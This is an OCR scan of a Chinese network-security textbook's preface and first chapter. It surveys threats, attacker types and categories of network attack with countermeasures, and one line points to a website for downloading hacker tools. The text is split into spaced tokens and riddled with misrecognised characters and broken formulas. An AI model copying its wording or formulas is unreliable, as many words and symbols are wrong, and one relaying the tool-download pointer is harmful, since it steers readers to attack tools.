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随 着 信息 社会 的 到 来 ，Intemet 迅猛 发 展 ， 网 络 已 经 影响 到 社会 生活 的 各 个 领域 ， 给 人 
类 的 生活 方式 带 来 了 巨大 的 变革 。 人 们 在 利用 网 络 实现 资源 共享 、 电 子 商 务 等 社会 活动 ， 
享受 网 络 给 我 们 带 来 的 便利 同时 ， 安 全 问题 也 变 得 日 益 突出 。 黑 客 入 侵 、 网 络 病毒 肆虐 ， 
网 络 系统 损害 或 肉 痪 ， 重 要 数据 被 窃取 或 毁坏 等 ， 给 政府 、 企 业 以 及 个 人 带 来 了 巨大 的 经 
济 损失 ， 也 为 网 络 的 健康 发 展 造成 巨大 的 障碍 。 网 络 信息 安全 问题 已 成 为 网 络 技术 领域 的 
重要 研究 课题 ， 已 经 成 为 一 个 组 织 生 死 存亡 或 贸易 亏 春 成 败 的 决定 性 因素 之 一 ， 因 此 信息 
安全 逐渐 成 为 人 们 关注 的 焦点 。 世 界 范围 内 的 各 国家 、 机 构 、 组 织 、 个 人 都 在 探寻 如 何 保 
障 信息 安全 的 问题 ， 各 相关 部 门 和 研究 机 构 也 纷纷 投入 相当 的 人 力 、 物 力 和 资金 试图 来 解 
决 信息 安全 问题 。 

全 书 总 共 分 10 章 ， 主 要 内 容 包 括 网 络 安全 概述 、 数 据 加 密 和 认证 、 常 见 网 络 攻击 方 
法 与 防护 、 病 毒 分 析 与 防御 、 防 火 墙 技 术 、 操 作 系 统 安全 、Web 安全 防范 、 无 线 网 络 安 
全 、 网 络 安全 管理 、 项 目 实践 。 本 书 跟踪 计算 机 网 络 安全 技术 的 发 展 方向 并 吸取 相关 最 新 
研究 成 果 ， 主 要 讲述 了 网 络 安全 理论 及 相关 基础 知识 ， 同 时 也 讲述 了 计算 机 网 络 安全 方面 
的 管理 、 配 置 及 维护 的 实际 操作 手法 和 手段 。 

本 书 内 容 特 色 体现 在 以 下 3 个 方面 : @ 通 俗 易 懂 。 计 算 机 网 络 的 技术 性 很 强 ， 网 络 安 
全 技术 本 身 也 比较 上 涩 难 懂 ， 本 书 力求 以 通俗 的 语言 和 清晰 的 叙述 方式 ， 向 读者 介绍 计算 
机 网 络 安全 的 基本 理论 、 基 本 知识 和 实用 技术 。@@ 突 出 实用 。 通 过 阅读 本 书 ， 读 者 可 掌握 
计算 机 网 络 安全 的 基础 知识 ， 并 了 解 设计 和 维护 网 络 及 其 应 用 系统 安全 的 基本 手段 和 方 
法 。 本 书 在 编写 形式 上 突出 了 应 用 的 需求 ， 每 一 章 的 理论 内 容 都 力求 结合 实际 案例 进行 教 
学 ,第 10 章 还 设计 了 与 前 述 章节 内 容 配 套 的 实 训 方 案 ， 从 而 为 教学 和 自主 学 习 提 供 了 方 
便 。@ 选 材 新 颖 。 计 算 机 应 用 技术 和 网 络 技术 的 发 展 是 非常 迅速 的 ， 本 书 在 内 容 组 织 上 力 
图 靠近 新 知识 、 新 技术 的 前 沿 ， 以 使 本 书 能 较 好 地 反映 新 理论 和 新 技术 。 

本 书 由 长 期 工作 在 教学 的 第 一 线 的 教师 编写 ， 他 们 都 具有 丰富 的 教学 经 验 。 其 中 第 1 
章 和 第 9 章 由 付 忠勇 编写 ， 第 2、3、4 章 由 乔 明 秋 编写 ， 第 5 章 由 李 焕 春 编写 ， 第 6 章 由 
赵 振 洲 编写 ， 第 7 章 由 胡 晓 凤 编写 ， 第 8 章 由 刘 亚 琦 编写 ， 第 10 章 由 上 述 6 位 老师 共同 
完成 。 全 书 由 付 忠 勇 、 赵 振 洲 负责 内 容 的 组 织 、 统 稿 和 审定 。 

限于 水 平 ， 朴 漏 与 廖 误 之 处 在 所 难免 ， 奶 请 专家 、 同 人 及 广大 读者 批评 指教 。 
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【项 目 要 点 】 


@ ”网 络 安全 现状 及 面临 的 威胁 。 
@@ 网络 攻击 的 类 别 。 
@ ”网 络 安全 的 特点 、 属 性 及 主要 安全 技术 。 


【学 习 目 标 】 
@ 了解 网 络 发 展 及 网 络 安全 现状 。 
@ 了 解 常见 的 网 络 攻击 手段 . 


@ 掌握 网 络 安全 的 特点 和 属性 。 
@ “掌握 网 络 安全 的 基本 要 素 。 


近年 来 ， 计 算 机 信息 技术 的 发 展 ， 使 网 络 成 为 全 球 信息 传递 、 信 息 交 互 的 主要 途径 ， 
并 在 政治 、 经 济 、 军 事 、 文 化 、 教 育 等 社会 生活 的 各 个 领域 产生 巨大 影响 ， 迅 速 改变 着 人 
们 的 生产 和 生活 方式 。 然 而 ， 信 息 网 络 的 发 过， 同时 伴随 着 巨大 的 风险 。 事 实 上 ， 网 络 安 
全 成 为 关系 国家 主权 和 国家 安全 、 经 济 繁荣 和 社会 稳定 、 文 化 传承 和 教育 进步 的 重大 问 
题 ， 并 且 随 着 全 球 化 步伐 的 加 快 而 愈 显 其 重要 。 因 此 ， 利 用 网 络 信息 资源 的 同时 ， 必 须 加 
强 网 络 信息 安全 技术 的 研究 和 开发 。 

网 络 安全 已 经 成 为 网 络 发 展 的 瓶颈 ， 阻 碍 着 网 络 应 用 在 各 个 领域 的 纵深 发 展 。 面 对 网 
络 安全 的 严峻 形势 ， 我 们 应 当 持 辨证、 客观 的 态度 ， 一 方面 不 能 因 嘲 废 食 、 拒 绝 先进 的 网 
络 技术 和 文化 ， 另 一 方面 要 对 网 络 的 安全 威胁 给 予 充分 的 重视 。 政 府 对 网 络 安全 技术 的 研 
发 积极 支持 ， 普 通 网 络 使 用 者 和 网 络 服务 提供 商 也 应 该 充分 认识 网 络 安全 及 网 络 管理 的 重 
要 性 ， 保 护 好 个 人 、 集 体 和 国家 利益 不 受 侵害 。 

构筑 信息 网 络 安全 防线 事 关 重大 ， 刻 不 容 缓 。 


1.1 网 络 安全 现状 
1.1.1 网 络 发 展 


20 世纪 末 ， 信 息 技术 领域 内 最 使 人 振奋 的 重大 事件 是 互联 网 的 发 展 ， 它 已 遍及 180 多 
个 国家 和 地 区 。 无 论 你 身 在 办 公 室 、 家 里 、 工 地 、 野 外 、 大 街 ， 抑 或 是 你 正在 旅途 中 、 海 
边 ， 都 可 以 与 互联 网 亲密 接触 ! 无 论 你 是 在 工作 、 学 习 、 玩 游戏 还 是 炒股 票 ， 你 都 需要 互 
联网 ! 

据 《第 37 次 中 国 互联 网 络 发 展 状况 统计 报告 》 统 计 ， 截 至 2015 年 12 月 ， 中 国 网 民 
人 数 已 经 达到 6.88 亿 ， 网 民 规模 位 居 世 界 第 一 ， 全 年 共计 新 增 网 民 3951 万 人 。 目 前 中 国 
的 互联 网 普及 率 已 经 达到 50.3%， 比 上 年 同期 提高 了 2.4 个 百分点 ( 见 图 1-1)。 互 联网 在 中 
国 的 应 用 正 逐 步 广 泛 化 ， 越 来 越 多 的 人 接触 到 互联 网 ， 并 从 互联 网 世界 获 益 。 根 据 CNNIC 
统计 ， 接 触 过 互联 网 的 人 中 ，99% 都 会 继续 上 网 。 

近 几 年 ， 网 络 空间 逐渐 被 视 为 继 陆 、 海 、 空 、 天 之 后 的 “第 五 空间 ”， 成 为 国际 社会 
关注 的 焦点 和 热点 。 水 能 载 舟 ， 亦 能 覆 舟 。 网 络 在 方便 和 丰富 人 们 生活 的 同时 ， 使 得 网 络 


2. 
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攻击 活动 有 机 可 乘 。 世 界 各 国 纷纷 将 网 络 安全 提升 到 国家 战略 高 度 予以 重视 ， 我 国 也 不 例 
外 。 中 央 网 络 安全 和 信息 化 领导 小 组 的 成 立 恰 逢 其 时 ， 习 近 平 总 书记 在 第 一 次 会 议 上 发 表 
了 重要 讲话 ， 指 出 “没有 网 络 安全 就 没有 国家 安全 ”， 彰 显 出 我 国 加 强 网 络 安全 保障 的 
决心 。 


万 人 中 国 网 民 规 模 和 互联 网 普及 率 








r 
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来 源 : CINNIC 中 国 5 联网 络 发 展 状 况 统计 i 查 2015.12 
图 1-1 中 国 网 民 规 模 和 年 增长 率 
1.1.2 网络 安全 概念 


国际 标准 化 组 织 (ISO) 将 计算 机 网 络 安全 定义 为 : “为 数据 处 理 系统 建立 和 采取 的 技术 
与 管理 的 安全 保护 ， 保 护 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 不 因 偶然 的 或 者 恶意 的 
原因 而 遭受 到 破坏 、 更 改 、 泄 露 ， 系 统 连续 可 靠 、 正 常 地 运行 ， 网 络 服务 不 中 断 。” 

上 述 计 算 机 安全 的 定义 包含 物理 安全 和 逻辑 安全 两 方面 的 内 容 ， 其 逻辑 安全 的 内 容 可 
理解 为 我 们 常 说 的 网 络 上 的 信息 安全 ， 是 指 对 信息 的 保密 性 、 完 整 性 和 可 用 性 的 保护 。 而 
网 络 安全 性 的 含义 是 信息 安全 的 引申 ， 即 网 络 安全 是 对 网 络 信息 保密 性 、 完 整 性 和 可 用 性 
的 保护 。 从 广义 来 说 ， 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 可 控 性 
的 相关 技术 和 理论 ， 都 是 网 络 安全 的 研究 领域 。 

网 络 安全 应 具有 以 下 5 个 方面 的 特征 。 

@ ”保密 性 : 信息 不 泄露 给 非 授权 用 户 、 实 体 或 过 程 ， 或 供 其 利用 的 特性 。 

@ ”完整 性 : 数据 未 经 授权 不 能 进行 改变 的 特性 。 即 信息 在 存储 或 传输 过 程 中 保持 不 

被 修改 、 不 被 破坏 和 丢失 的 特性 。 

@ ”可 用 性 : 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 ， 即 当 需 要 时 能 否 存 取 所 需 的 信 
息 。 例 如 网 络 环境 下 拒绝 服务 、 破 坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 
性 的 攻击 。 

@ 可 控 性 : 对 信息 的 传播 及 内 容 具 有 控制 能 力 。 

@ ”可 审查 性 ， 出现 安全 问题 时 能 提供 依据 与 手段 。 

当然 ， 网 络 安全 的 具体 含义 会 随 着 “角度 ”的 变化 而 变化 。 比 如 ， 从 用 户 (个 人 、 企 业 
等 ) 角 度 ， 他 们 希望 涉及 个 人 隐私 或 商业 利益 的 信息 在 网 络 上 传输 时 受到 机 密 性 、 完 整 性 和 
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真实 性 的 保护 ， 避 免 其 他 人 利用 窃听 、 冒 充 、 自 改 、 抵 赖 等 手段 侵犯 用 户 的 利益 和 隐私 。 
从 网 络 运行 和 管理 者 角度 说 ， 他 们 希望 对 本 地 网 络 信息 的 访问 、 读 写 等 操作 受到 保护 和 控 
制 ， 避 免 出 现 “ 陷 门 ”、 病 毒 、 非 法 存 取 、 拒 绝 服务 和 网 络 资源 非法 占用 以 及 非法 控制 等 
威胁 ， 制 止 和 防御 网 络 黑客 的 攻击 。 对 安全 保密 部 门 来 说 ， 他 们 希望 对 非法 的 、 有 害 的 或 
涉及 国家 机 密 的 信息 进行 过 滤 和 防 堵 ， 避 免 机 要 信息 泄露 ， 避 免 对 社会 产生 危害 、 对 国家 
造成 巨大 损失 。 从 社会 教育 和 意识 形态 角度 来 讲 ， 网 络 上 不 健康 的 内 容 ， 会 对 社会 的 稳定 
和 人 类 的 发 展 造成 阻碍 ， 必 须 对 其 进行 控制 。 


1.1.3 ”网 络 安全 现状 


近年 来 ， 随 着 Interet 的 飞速 发 展 ， 计 算 机 网 络 的 资源 共享 进一步 加 强 ， 随 之 而 来 的 
信息 安全 问题 日 益 突出 。 据 美国 FBI 统计 ， 美 国 每 年 网 络 安全 问题 所 造成 的 经 济 损失 高 达 
75 亿美 元 。 而 全 球 平均 每 20 秒 钟 就 发 生 一 起 Intemet 计算 机 侵入 事件 。 国 家 互联 网 应 急 中 
心 发 布 的 《2015 年 中 国 互联 网 网 络 安全 报告 》 显 示 ，2015 年 互联 网 应 急 中 心 共 接 收 境内 
外 报告 的 网 络 安全 事件 126 916 起 ， 较 2014 年 增长 了 125.9%。 其 中 ， 境 内 报告 网 络 安全 
事件 126 424 起 ， 较 2014 年 增长 了 128.6%; 境外 报告 网 络 安全 事件 492 起 ， 较 2014 年 下 
降 43.9%。 发 现 的 网 络 安全 事件 中 ， 数 量 排 前 三 位 的 类 型 分 别 是 网 页 仿冒 事件 ( 占 59.8%)、 
漏洞 事件 ( 占 20.2%) 和 网 页 算 改 事件 ( 占 9.8%)。2015 年 ， 互 联网 应 急 中 心 共 成 功 处 理 各 类 
网 络 安全 事件 125 815 起 ， 较 2014 年 的 56 072 起 增长 124.4%。 

在 Intemet/Intranet 的 大 量 应 用 中 ，Intermet/Intranet 安全 面临 着 重大 的 挑战 ， 事 实 上 ， 
资源 共享 和 安全 历来 是 一 对 矛盾 。 在 一 个 开放 的 网 络 环境 中 ， 大 量 信息 在 网 上 流动 ， 这 为 
不 法 分 子 提供 了 攻击 目标 。 而 且 计 算 机 网 络 组 成 形式 的 多 样 性 、 终 端 分 布 广 和 网 络 的 开放 
性 、 互 联 性 等 特征 更 为 他 们 提供 便利 。 他 们 利用 不 同 的 攻击 手段 ， 获 得 访问 或 修改 在 网 中 
流动 的 敏感 信息 ， 交 入 用 户 或 政府 部 门 的 计算 机 系统 ， 进 行 窥视 、 窃 取 、 自 改 数据 。 不 受 
时 间 、 地 点 、 条 件 限 制 的 网 络 诈骗 ， 其 “ 低 成 本 和 高 收益 ”又 在 一 定 程度 上 刺激 了 犯罪 的 
增长 ， 使 得 针对 计算 机 信息 系统 的 犯罪 活动 日 益 增多 。 








1.2 网络 安全 威胁 


所 谓 网 络 安 全 威胁 ， 是 指 对 网 络 和 信息 的 机 密 性 、 完 整 性 、 可 用 性 在 合法 使 用 时 可 能 
造成 的 危害 。 
从 人 为 (黑客 ) 角 度 来 看 ， 常 见 的 计算 机 网 络 安全 威胁 主要 有 信息 泄露 、 完 整 性 破坏 、 
拒绝 服务 攻击 、 网 络 滥用 。 
@ 信息 泄露 : 信息 泄露 破坏 了 系统 的 保密 性 ， 信 息 被 透露 给 非 授权 的 实体 。 常 见 的 
能 够 导致 信息 泄露 的 威胁 有 网 络 监听 、 业 务 流 分 析 、 电 磁 截 获 、 射 频 截获 、 人 员 
的 有 意 或 无 意 、 媒 体 清理 、 漏 洞 利用 、 授 权 侵 犯 、 物 理 侵入 、 病 毒 、 木 马 、 后 
门 、 流 氓 软件 、 网 络 钓鱼 。 
@ 完整 性 破坏 : 可 以 通过 物理 侵犯 、 授 权 侵犯 、 病 毒 、 木 马 、 漏 洞 等 方式 来 实现 。 
@ ”拒绝 服务 攻击 : 对 信息 或 资源 可 以 合法 地 访问 却 被 非法 的 拒绝 或 者 操作 延迟 等 与 
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@ ”网 络 滥用 : 合法 的 用 户 滥用 网 络 ， 引 入 不 必要 的 安全 威胁 ， 包 括 非 法 外 联 、 非 法 
内 联 、 移 动 风险 、 设 备 滥用 、 业 务 滥用 。 
常见 的 计算 机 网 络 安全 威胁 的 表现 形式 主要 有 窃听 、 重 传 、 自 改 、 拒 绝 服 务 攻 击 、 行 
为 否认 、 电 子 欺骗 、 非 授权 访问 、 传 播 病毒 。 
@ 窃听 : 攻击 者 通过 监视 网 络 数据 的 手段 获得 重要 的 信息 ， 从 而 导致 网 络 信息 的 
泄密 。 
@。 重 传 : 攻击 者 事先 获得 部 分 或 全 部 信息 以 后 ， 将 此 信息 发 送 给 接收 者 。 
@ ” 算 改 : 攻击 者 对 合法 用 户 之 间 的 通信 信息 进行 修改 、 删 除 、 插 入 ， 再 将 伪造 的 信 
息 发 送 给 接收 者 ， 这 就 是 纯粹 的 信息 破坏 ， 这 样 的 网 络 侵犯 者 被 称 为 积极 侵犯 
者 。 积 极 侵犯 者 的 破坏 作用 最 大 。 
@ ”拒绝 服务 攻击 : 攻击 者 通过 某 种 方法 使 系统 响应 减 慢 甚至 瘫 病 ， 阻 止 合法 用 户 获 
得 服务 。 
@ ”行为 否认 : 通信 实体 否认 已 经 发 生 的 行为 。 
@ ”电子 欺骗 ， 通 过 假冒 合法 用 户 的 身份 来 进行 网 络 攻击 ， 从 而 达到 掩盖 攻击 者 真实 
身份 、 嫁 祸 他 人 的 目的 。 
@ 非 授权 访问 : 没有 预先 经 过 同意 ， 就 使 用 网 络 或 计算 机 资源 ， 被 看 作 非 授权 
访问 。 
@ “传播 病毒 通过 网 络 传播 计算 机 病毒 ， 其 破坏 性 非常 高 ， 而 且 用 户 很 难 防范 。 
当然 ， 除 了 人 为 因素 ， 网 络 安全 在 很 大 部 分 上 还 由 网 络 内 部 、 安 全 机 制 或 者 安全 工具 
本 身 的 局 限 性 所 决定 ， 主 要 表现 在 : 每 一 种 安全 机 制 都 有 一 定 的 应 用 范围 和 应 用 环境 、 安 
全 工具 的 使 用 受到 人 为 因素 的 影响 、 系 统 的 后 门 是 传统 安全 工具 难于 考虑 到 的 地 方 、 只 要 
是 程序 就 可 能 存在 Bug。 而 这 一 系列 的 缺陷 ， 更 加 给 想 要 进行 攻击 的 人 以 方便 。 因 此 ， 网 
络 安全 问题 可 以 说 是 由 人 所 引起 的 。 


1.3 网 络 攻 击 
1.3.1 ”潜在 的 网 络 攻击 者 


潜在 的 网 络 攻击 者 有 以 下 几 种 情况 。 

(1) 国家 : 组 织 精良 并 得 到 很 好 的 财政 资助 。 

(2) 黑客 : 攻击 网 络 和 系统 ， 企 图 探求 操作 系统 的 脆弱 性 或 其 他 缺陷 的 人 们 ， 如 能 解 
密 者 、 行 为 不 良 者 、 惠 窃 者 、 电 话 黑客 。 

(3) 计算 机 恐怖 分 子 ， 国 内 外 代表 各 种 恐怖 分 子 或 极端 势力 的 个 人 或 团体 。 

(4) 有 组 织 犯罪 。 有 组 织 和 财政 资助 的 犯罪 团体 。 

(5) 其 他 犯罪 成 员 : 犯罪 群体 的 其 他 部 分 ， 单 独行 动 的 个 人 。 

(6) 国际 新 闻 机 构 : 收集 和 发 布 消 息 ， 其 行为 包括 收集 关于 任何 人 和 事 的 情报 。 

(7) 商业 竞争 (工业 竞争 ): 在 竞争 市 场 中 的 国内 外 公司 或 集团 。 
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(8) 不 满 的 雇员 : 对 公司 或 集团 不 满 的 人 ， 能 够 对 系统 实行 内 部 威胁 。 
(9) 不 小 心 或 未 受到 良好 训练 的 雇员 : 缺乏 训练 、 操 作 失误 、 对 安全 认识 不 足 的 人 。 


1.3.2 网络 攻击 的 种 类 


1. 被 动 攻击 

监视 网 络 上 的 信息 传送 ， 包 括 监视 明文 ， 解 密 加 密 不 善 的 通信 数据 ， 口 令 嗅 探 等 。 可 
通过 通信 量 分 析 获取 通信 模式 。 

抵抗 : 使 用 VPN, 加 密 。 

2. 主动 攻击 


企图 避 开 或 打破 安全 防护 ， 引 入 恶意 代码 以 及 转换 数据 或 破坏 系统 的 完整 性 。 

(1) 修改 传输 中 的 数据 : 如 在 金融 领域 ， 改 变 交 易 的 数量 或 将 交易 转移 到 别 的 账户 。 

(2) 替换 : 插入 数据 ， 重 放 。 

(3) 会 话 劫持 : 未 授权 使 用 一 个 已 经 建立 的 会 话 。 

(4) 伪装 成 授权 的 用 户 或 服务 器 : 通过 实施 嗅 探 或 其 他 手段 获得 用 户 / 管 理 员 信息 ， 然 
后 使 用 该 信息 作为 一 个 授权 用 户 登 录 ， 同 样 可 对 服务 器 实施 攻击 。 

(5) 获取 系统 应 用 和 操作 系统 软件 的 缺陷 : 攻击 者 探求 运行 操作 系统 和 应 用 软件 中 的 
脆弱 性 ， 如 Windows 95 和 Windows NT 都 存在 许多 漏洞 。 

(6) 拥 取 主机 或 网 络 信任 : 攻击 者 通过 操作 文件 使 远方 主机 提供 服务 ， 从 而 抽取 传递 
信任 ， 知 名 的 攻击 有 rhost 和 rlogin。 

(7) 获得 数据 执行 : 攻击 者 将 恶意 代码 植 入 看 起 来 无 害 的 供 下 载 的 软件 和 电子 邮件 
中 ， 从 而 使 用 户 执行 该 恶意 代码 。 恶 意 代码 可 用 于 破坏 和 修改 文件 ， 特 别 是 包含 权限 参数 
和 权限 值 的 文件 。 如 PostScript、Active- X 和 微软 的 Word 宏 病 毒 等 。 

(8) 恶意 代码 插入 并 刺探 : 通过 先前 发 现 的 脆弱 性 并 使 用 该 访问 来 达到 攻击 。 例 如 : 
使 用 特洛伊 木马 、 陷 门 。 黑 客 工 具 如 : Rootkit(http://www.rootshell.com 可 下 载 其 他 很 多 的 
黑客 工具 )， 具 有 总 控 能 力 ， 包 括 插入 脚本 ， 获 取 根 权限 。 

(9) 拒绝 服务 : 在 网 络 中 扩散 垃圾 包 以 及 向 邮件 中 心 扩 散 垃圾 邮件 等 。 

3. 邻近 攻击 

未 授权 者 在 物理 上 接近 网 络 系统 或 设备 ， 目 的 是 修改 、 收 集 或 拒绝 访问 信息 ， 这 种 接 
近 可 以 秘密 进入 、 公 开 接 近 或 二 者 省 有 之 。 

(1) 修改 数据 或 收集 信息 : 攻击 者 获取 对 系统 的 物理 访问 ， 如 卫 地 址 、 登 录 的 用 户 名 
和 口令 等 ， 从 而 修改 和 窃取 信息 。 

(2) 物理 破坏 : 获得 对 系统 的 网 络 访问 ， 导 致 对 系统 的 物理 破坏 。 

4. 内 部 人 员 攻 击 

这 些 内 部 人 员 要 么 被 授权 在 信息 安全 处 理 系统 的 物理 范围 内 ， 要 么 对 信息 安全 处 理 系 
统 具 有 直接 访问 权 ， 常 常 是 最 难 检测 和 防范 的 。 如 不 明 身份 的 清洁 人 员 ( 下 班 后 的 物理 访 
问 )、 授 权 的 系统 用 户 和 恶意 的 系统 管理 员 。 其 攻击 方式 有 以 下 几 种 。 
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(1) 修改 数据 或 安全 机 制 : 攻击 者 常常 对 信息 具有 访问 权 ， 他 们 进行 未 授权 操作 或 破 
坏 数 据 (他 们 知道 系统 布局 、 有 价值 的 数据 在 何 处 以 及 何 种 安全 防范 系统 在 工作 )。 

(2) 建立 未 授权 网 络 连接 : 对 机 密 网 络 具 有 物理 访问 能 力 的 用 户 ， 未 授权 连接 到 一 个 
低 机 密级 别 或 敏感 网 络 中 。 

(3) 秘密 通道 : 建立 未 授权 的 通信 路 径 ， 用 于 从 本 地 区 域 向 远程 传输 盗用 信息 。 

(4) 物理 损坏 或 破坏 : 攻击 者 赋予 的 物理 访问 权 。 

对 付 方法 : 安全 防范 意识 和 训练 ， 审 计 和 入 侵 检测 ， 关 键 数据 、 服 务 的 访问 控制 ， 强 
身份 识别 与 认证 。 

5. 分 发 攻击 


分 发 攻击 是 指 在 软件 和 硬件 开发 出 来 之 后 和 安装 之 前 这 段 时 间 ， 当 它 从 一 个 地 方 传送 
到 另 一 个 地 方 时 ， 攻 击 者 恶意 修改 软 硬 件 。 

(1) 在 制造 商 的 设备 上 修改 软件 、 硬 件 ， 在 生产 线 上 流通 时 ， 修 改 软 、 硬 件 配置 。 

(2) 在 产品 分 发 时 修改 软 /硬件 : 在 分 发 期 内 修改 软 硬 件 配置 ， 如 在 装 船 时 安装 窃听 
设备 。 

对 付 方法 : 在 产品 中 加 密 签 名 ， 严 格 管理 等 。 


1.4 网 络 安全 的 特点 及 属性 
1.4.1 网 络 安全 特点 


一 个 系统 是 否 安全 ， 依 赖 它 所 应 用 的 环境 、 应 用 的 目的 、 外 在 的 威胁 等 多 种 因素 ， 网 
络 安全 问题 虽然 是 随 着 互联 网 的 发 展 出 现 的 ， 但 似乎 和 现实 安全 问题 一 样 ， 将 会 是 一 个 永 
恒 的 问题 ， 其 具有 鲜明 的 特点 。 


1. 攻击 与 防守 的 不 对 称 性 


实施 网 络 安全 威胁 的 攻击 者 ， 通 常会 突破 网 络 默认 的 规则 ， 利 用 攻击 工具 或 系统 软 
件 、 应 用 软件 以 及 协议 上 的 漏洞 ， 或 者 通过 勾结 内 部 人 员 等 达到 攻击 目的 。 

攻击 是 有 备 而 来 的 ， 在 当前 的 网 络 环境 下 ， 攻 击 工 具 较 容易 获得 ， 攻 击 风险 低 、 追 踪 
难 。 对 于 防卫 人 员 来 说 则 恰恰 相反 ， 意 味 着 必须 堵 住 所 有 可 能 的 漏洞 ， 否 则 整个 防御 就 可 
能 毁 于 一 旦 。 

如 果 把 安全 问题 比 作 一 段 链条 ， 最 脆弱 的 一 环 可 以 使 整个 链条 断裂 。 不 断 增 加 的 网 络 
复杂 性 使 得 安全 防护 的 难度 日 益 增 大 ，100% 的 绝对 网 络 安全 根本 难以 做 到 。 

攻击 可 以 攻 其 一 点 ， 防 守 却 要 全 面 防御 ; 受到 攻击 几乎 是 必然 的 ， 而 保证 安全 却 是 相对 
的 ; 很 多 攻击 者 具有 专业 知识 和 经 验 ， 而 大 部 分 用 户 却 只 会 基础 应 用 ， 这 是 很 不 对 称 的 。 


2. 网 络 安全 的 动态 特性 


网 络 安全 威胁 是 变化 的 。 
无 论 我 们 采取 了 多 么 先进 的 技术 来 进行 安全 防范 ， 但 随 着 时 间 的 推移 ， 操 作 系统 、 硬 
件 平台 、 应 用 软件 、 网 络 协议 等 都 会 不 断 更 新 ， 在 这 个 过 程 中 ， 原 来 存在 的 一 系列 安全 问 
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题 都 发 生 着 变化 ， 如 旧 的 漏洞 可 能 不 存在 或 者 不 重要 了 ， 但 新 的 漏洞 又 出 现 了 。 为 了 应 付 
新 的 安全 风险 ， 网 络 安全 防范 也 永远 处 于 动态 之 中 ， 因 此 ， 不 可 能 存在 一 劳 永 逸 的 技术 或 
解决 方案 。 


3. 攻击 与 防御 的 经 济 性 问题 


在 网 络 安全 方面 ， 投 入 的 代价 既 可 能 是 资金 、 人 力 ， 也 可 能 是 时 间 、 易 用 性 。 

网 络 安全 在 很 大 程度 上 依赖 于 投入 。 为 了 让 信息 系统 更 安全 ， 可 能 需要 使 用 很 多 安 
全 设备 和 技术 ， 雇 用 许多 安全 专业 人 员 。 所 以 ， 拥 有 的 资源 越 多 ， 就 越 可 能 达到 更 好 的 安 
全 程度 。 

但 这 里 就 有 一 个 矛盾 : 假设 要 保护 的 资产 价值 为 M， 而 安全 投入 为 m。 如 果 m<M， 
可 能 系统 的 安全 程度 不 够 ， 如 果 mM， 或 者 m 接近 M， 则 安全 投入 就 失去 了 意义 。 同 
样 ， 这 个 矛盾 对 于 攻击 者 也 存在 ， 攻 击 的 代价 如 果 超 过 了 攻击 者 的 获 益 ， 也 是 没有 意义 的 。 

并 且 ， 信 息 服务 的 本 质 是 开放 性 的 ， 或 者 是 部 分 开放 ， 或 者 是 完全 开放 。 例 如 ， 提 供 
检索 的 搜索 引擎 、 新 闻 网 站 、 各 种 公共 信息 网 站 是 面向 所 有 用 户 的 ， 企 业 信息 是 针对 部 分 
对 象 ， 如 企业 与 企业 之 间 ， 企 业 对 用 户 、 企 业 对 内 部 职员 等 。 而 采取 各 种 网 络 防范 措施 就 
意味 着 限制 这 种 开放 性 ， 必 然 给 使 用 带 来 不 便 。 

一 般 情 况 下 ， 谁 拥有 的 资源 (技术 能 力 、 专 业 人 员 等 ) 更 多 ， 谁 就 更 有 可 能 占 上 风 。 但 
很 多 时 候 却 相反 ， 系 统 越 复杂 ， 漏 洞 也 越 多 ， 实 施 的 网 络 攻击 更 容易 奏效 。 因 此 ， 以 合理 
的 代价 达到 一 定 程度 的 网 络 安全 是 网 络 安全 策略 的 出 发 点 。 

从 这 个 意义 上 来 讲 ， 各 种 网 络 安全 技术 及 措施 ， 其 目的 是 使 得 攻击 的 成 本 加 大 ， 增 强 
用 户 的 安全 感 ， 并 且 不 至 于 使 系统 太 烦琐 而 难以 使 用 。 


4. 人 是 网 络 安全 问题 的 核心 


实际 上 ， 不 管 我 们 采取 怎样 的 安全 防护 技术 ， 最 根本 的 还 是 人 ， 安 全 问题 的 根源 在 于 
人 性 的 弱点 ， 不 论 是 攻击 者 还 是 防卫 者 。 

攻击 者 的 动机 包括 获取 利益 、 好 奇 心 、 出 名 、 发 泄 、 政 治 或 军事 原因 等 ， 这 些 动机 和 
导致 社会 问题 的 动机 是 一 样 的 。 

而 对 于 防卫 者 来 说 ， 弱 点 则 是 麻痹 和 懒惰 。 每 当 一 场 危 机 来 临 的 时 候 ， 如 潜水、 瘟疫 
发 生 时 ， 人 们 的 安全 意识 会 很 快 上 升 ， 甚 至 会 达到 风声 稚 噢 、 草 木 缘 兵 的 程度 。 遗 憾 的 
是 ， 危 机 一 过 ， 人 们 很 快 就 会 恢复 到 常态 ， 直 到 下 次 危机 才 又 被 唤醒 。 

网 络 安全 也 一 样 。 可 以 预料 ， 只 要 人 性 的 弱点 存在 ， 不 管 安 全 技术 如 何 发 展 ， 安 全 问 
题 总 是 存在 并 不 断 变化 的 。 唯 一 能 够 确定 的 是 ， 永 远 没 有 100% 的 网 络 安全 。 既 然 如 此 ， 
我 们 为 什么 还 要 讨论 网 络 安全 技术 呢 ? 

现实 社会 中 虽然 有 假 钞 ， 信 用 卡 也 会 被 偷 穷 ， 但 人 们 仍然 在 大 量 使 用 ， 这 是 因为 技术 
进步 带 来 的 方便 程度 超过 了 可 能 的 损失 。 人 们 会 在 家 里 安装 防盗 门 、 保 险 柜 等 ， 虽 然 不 能 
万 无 一 失 ， 但 大 部 分 情况 下 仍 能 起 作用 ， 并 给 人 们 带 来 安全 感 。 

因此 ， 通 过 网 络 安全 技术 管理 手段 ， 最 大 限度 地 减少 风险 ， 增 加 攻击 者 的 成 本 ， 给 用 
户 带 来 安全 感 ， 并 使 正常 的 交易 、 业 务 能 够 进行 下 去 ， 就 是 网 络 安全 防御 的 目标 。 

安全 没有 绝对 的 、 统 一 的 标准 ， 因 为 每 个 人 的 利益 是 不 同 的 ， 每 个 组 织 或 单位 的 利益 
也 是 不 同 的 ; 一 个 系统 是 否 安 全 ， 取 决 于 它 所 采取 的 安全 措施 是 否 实现 了 既定 的 安全 政策 
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网 络 安全 更 多 地 被 作为 一 个 技术 问题 来 研究 。 但 是 不 管 这 种 技术 看 起 来 是 多 么 的 完 
善 ， 必 须要 有 人 的 参与 ， 配 合 以 良好 的 安全 管理 措施 ， 才 能 够 较 好 地 发 挥 作 用 。 因 此 ， 建 
